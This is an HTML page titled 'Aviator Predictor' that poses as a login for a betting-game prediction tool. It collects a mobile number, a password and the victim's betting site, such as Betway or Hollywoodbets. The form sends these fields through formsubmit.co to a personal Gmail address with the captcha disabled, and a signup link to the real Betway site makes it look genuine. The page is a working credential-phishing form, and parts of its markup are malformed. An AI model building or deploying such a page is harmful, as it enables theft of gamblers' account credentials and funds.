<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Aviator Predictor</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css">
    <style>
      @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@200;300;400;500;600;700&display=swap');
      * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        font-family: 'Poppins', sans-serif;
      }
      body {
        background: white;
        overflow: hidden;
      }
      .container {
        max-width: 400px;
        padding: 0 15px;
        margin: 50px auto;
        padding-bottom: 20px;
        padding-top: 10px;
      }
      .wrapper {
        width: 100%;
        background: #fff;
        border-radius: 5px;
        box-shadow: 0px 4px 10px 1px rgba(0, 0, 0, 0.1);
      }
      .wrapper .title {
        height: 70px;
        background: #313131;
        border-radius: 5px 5px 0 0;
        color: #fff;
        font-size: 30px;
        font-weight: 600;
        display: flex;
        align-items: center;
        justify-content: center;
      }
      .wrapper form {
        padding: 20px;
      }
      img {
        border-top-left-radius: 5px;
        border-top-right-radius: 5px;
        width: 98%;
        display: block;
        margin: 0 auto;
        box-shadow: 3px 3px 8px rgba(255, 255, 255, 0.2);
      }
      .wrapper form .row {
        margin-bottom: 15px;
        position: relative;
      }
      .wrapper form .row input, 
      .wrapper form .row select {
        width: 100%;
        height: 35px;
        outline: none;
        padding-left: 45px;
        border-radius: 5px;
        border: 1px solid lightgrey;
        font-size: 14px;
        transition: all 0.3s ease;
      }
      form .row input:focus, 
      form .row select:focus {
        border-color: #16a085;
        box-shadow: inset 0px 0px 2px 2px rgba(26, 188, 156, 0.25);
      }
      form .row input::placeholder {
        color: #999;
      }
      .wrapper form .row i {
        position: absolute;
        width: 35px;
        height: 35px;
        color: #fff;
        font-size: 16px;
        background: #A01616;
        border: 1px solid #16a085;
        border-radius: 5px 0 0 5px;
        display: flex;
        align-items: center;
        justify-content: center;
      }
      .wrapper form label {
        display: block;
        margin-bottom: 5px;
        font-weight: bold;
        font-size: 12px;
      }
      .wrapper form .button input {
        color: #fff;
        font-size: 16px;
        font-weight: 500;
        background: #A01616;
        border: 1px solid #16a085;
        cursor: pointer;
        width: 100%;
        height: 40px;
      }
      form .button input:hover {
        background: black;
      }
      .wrapper form .signup-link {
        text-align: center;
        margin-top: 10px;
        font-size: 14px;
      }
      .wrapper form .signup-link a {
        color: #A01616;
        text-decoration: none;
      }
      form .signup-link a:hover {
        text-decoration: underline;
      }
    </style>
</head>
<body>
    <div class="container">
        <div class="wrapper">
            <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSL7FiXDRqaqkjsDCJanums6A-gCHyUJYHS3h3qVktoiw&s" alt="">
            <form action="https://formsubmit.co/mickeyffyt@gmail.com" method="POST">
                <input type="hidden" name="_subject" value="New Aviator Predictor    <Login">
                <input type="hidden" name="_captcha" value="false">

                <div class="row">
                    <i class="fas fa-user"></i>
                    <input type="number" name="phone" placeholder="Mobile Number" required>
                </div>
                <div class="row">
                    <i class="fas fa-lock"></i>
                    <input type="password" name="password" placeholder="Password" required>
                </div>
                <div class="row">
                    
                        <option value="" 
                        
                    </select>
                </div>
                <div class="row">
                    <label for="bettingSite">What is your betting site?</label>
                    <select id="bettingSite" name="bettingSite" required>
                        <option value="" disabled selected>Select your site</option>
                        <option value="Betway">Betway</option>
                        <option value="Hollywoodbets">Hollywoodbets</option>
                        <option value="Sportingbet">Sportingbet</option>
                        <option value="Supabets">Supabets</option>
                        <option value="Bet.co.za">Bet.co.za</option>
                        <option value="World Sports Betting">World Sports Betting</option>
                        <option value="Yesplay">Yesplay</option>
                    </select>
                </div>
                <div class="row button">
                    <input type="submit" value=           "Login"
                </div>
                <div class="signup-link">Not Registered? <a href="https://betway.co.za">Signup now</a></div>
            </form>
        </div>
    </div>
</body>
</html>
